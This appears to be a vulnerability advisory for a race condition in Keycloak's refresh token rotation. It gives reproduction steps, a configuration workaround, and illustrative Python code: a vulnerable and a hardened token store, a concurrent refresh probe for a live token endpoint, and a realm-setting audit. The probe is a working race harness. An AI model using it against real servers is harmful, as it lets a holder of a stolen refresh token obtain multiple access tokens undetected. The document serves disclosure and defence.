Red Hat Keycloak
cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*
A race condition vulnerability has been identified in the Keycloak server's TokenManager class, which processes refresh token grants and enforces the realm's refresh token reuse policy. When refresh token rotation is enabled with strict single use, the check of a refresh token's use count and the update of that count are not performed atomically. Two or more refresh requests that arrive concurrently can therefore each pass validation before any of them records the use, and each is issued a new access token from the same refresh token. The single-use guarantee that refresh token rotation is meant to provide is thereby defeated.
Exploitation of this vulnerability allows an attacker who holds a copy of a valid refresh token to bypass the reuse policy when it is set to strict single use. By issuing several refresh requests at the same moment rather than one after another, the attacker obtains multiple valid access tokens from one refresh token, and the reuse detection that rotation relies on to flag a stolen token never triggers because no individual request is observed as a reuse.
To reproduce this vulnerability, enable strict refresh token rotation in the realm by turning on Revoke Refresh Token and setting the refreshTokenMaxReuse policy to zero (the reuse limit only applies when revocation is on). Obtain a fresh refresh token, then send several refresh_token grant requests that carry the same token to the realm's token endpoint concurrently, so that they overlap in flight rather than arriving one after another. On an affected build the TokenManager fails to record the first use before the other requests are validated, and more than one request returns an access token; on a build without the flaw exactly one request succeeds and the rest are rejected with an invalid_grant error.
As a configuration workaround, set the refreshTokenMaxReuse policy in the affected realm to a value greater than zero. Note what this does and does not achieve: it does not restore strict single use, it deliberately tolerates a bounded number of reuses so that the realm's reuse handling no longer depends on the non-atomic single-use check, and it should be treated as a stop-gap rather than a fix. The setting is a realm attribute (Realm settings, Tokens tab, or the refreshTokenMaxReuse field of the realm representation in the admin REST API); changes made through the admin console or admin REST API apply to subsequent token requests without restarting or redeploying the Keycloak service.
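The reproduction steps and the realm setting used in the workaround, as an added example; this is illustrative code, not code from Keycloak or Red Hat. The RefreshTokenStore class is a deliberately simplified model of check-then-update reuse tracking (not Keycloak's session data model), shown in its vulnerable and atomic forms; the keycloak_refresh probe assumes a standard OpenID Connect token endpoint at /realms/{realm}/protocol/openid-connect/token and a client ID (and secret, if confidential) that you supply; strict_rotation_enabled reads the revokeRefreshToken and refreshTokenMaxReuse fields of the admin REST API's realm representation.

```python
"""
Added example, not code from Keycloak or Red Hat. It (1) models the
non-atomic check-then-update behind the race with a hardened variant
beside it, (2) gives a concurrent probe for a real token endpoint, and
(3) audits a RealmRepresentation for the strict single-use setting.
"""
import json
import threading
import urllib.error
import urllib.parse
import urllib.request
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Dict, Optional, Tuple


class RefreshTokenStore:
    """Simplified model of refresh-token reuse tracking (not Keycloak's data model).

    A token may be refreshed while its use count is <= max_reuse, so
    max_reuse=0 is strict single use and max_reuse=N allows N extra uses.
    """

    def __init__(self, max_reuse: int, atomic: bool, sync_parties: Optional[int] = None):
        self.max_reuse = max_reuse
        self.atomic = atomic
        self.uses: Dict[str, int] = {}
        self.lock = threading.Lock()
        # Constructed interleaving for the vulnerable path: hold every caller
        # after validation until all have validated, then let them all update.
        self.barrier = threading.Barrier(sync_parties) if sync_parties else None

    def refresh(self, token: str) -> bool:
        if self.atomic:
            # Hardened: validation and increment happen as one indivisible step.
            with self.lock:
                count = self.uses.get(token, 0)
                if count > self.max_reuse:
                    return False
                self.uses[token] = count + 1
                return True
        # Vulnerable: validation and update are separate, unsynchronised steps.
        count = self.uses.get(token, 0)
        if count > self.max_reuse:
            return False
        if self.barrier is not None:
            self.barrier.wait()
        self.uses[token] = count + 1  # every racer writes 1; none sees the others
        return True


def race_refresh(refresh: Callable[[str], bool], token: str, workers: int) -> int:
    """Run `workers` refreshes of the same token concurrently; return the success count."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda _: refresh(token), range(workers)))
    return sum(1 for ok in results if ok)


def demo_race(workers: int = 8, max_reuse: int = 0) -> Tuple[int, int]:
    """(successes against the non-atomic store, successes against the atomic store)."""
    vulnerable = RefreshTokenStore(max_reuse, atomic=False, sync_parties=workers)
    hardened = RefreshTokenStore(max_reuse, atomic=True)
    return (race_refresh(vulnerable.refresh, "rt-1", workers),
            race_refresh(hardened.refresh, "rt-1", workers))


def keycloak_refresh(token_endpoint: str, client_id: str, refresh_token: str,
                     client_secret: Optional[str] = None, timeout: float = 10.0) -> bool:
    """One refresh_token grant against a live token endpoint.

    True when the server returns an access token; False on the 400
    invalid_grant that a consumed token should produce. Endpoint and client
    values are supplied by the caller (nothing is assumed about your realm).
    """
    form = {"grant_type": "refresh_token", "client_id": client_id,
            "refresh_token": refresh_token}
    if client_secret:
        form["client_secret"] = client_secret
    req = urllib.request.Request(
        token_endpoint, data=urllib.parse.urlencode(form).encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return "access_token" in json.loads(resp.read().decode())
    except urllib.error.HTTPError:
        return False


def strict_rotation_enabled(realm: Dict) -> bool:
    """True when a RealmRepresentation (GET /admin/realms/{realm}) enforces single use:
    revokeRefreshToken switches rotation on, refreshTokenMaxReuse=0 forbids reuse."""
    return bool(realm.get("revokeRefreshToken")) and int(realm.get("refreshTokenMaxReuse", 0)) == 0


if __name__ == "__main__":
    racy, safe = demo_race(workers=8, max_reuse=0)
    print(f"non-atomic store, max_reuse=0: {racy} of 8 concurrent refreshes succeeded")
    print(f"atomic store,     max_reuse=0: {safe} of 8 concurrent refreshes succeeded")
    # Live probe against a server you are authorised to test (placeholders to fill in):
    # endpoint = "https://KEYCLOAK_HOST/realms/REALM/protocol/openid-connect/token"
    # probe = lambda t: keycloak_refresh(endpoint, "CLIENT_ID", t, client_secret=None)
    # print(race_refresh(probe, "FRESHLY_ISSUED_REFRESH_TOKEN", 8))
```

Run stand-alone, the script shows all eight concurrent refreshes succeeding against the non-atomic store and exactly one against the atomic store under a single-use policy. Pointed at a real realm with Revoke Refresh Token on and refreshTokenMaxReuse at zero, the same race_refresh harness should report exactly one success on a build without the flaw; more than one success from a single freshly issued refresh token is the signature of this race. Because a successful refresh consumes the token, each probe needs a new refresh token.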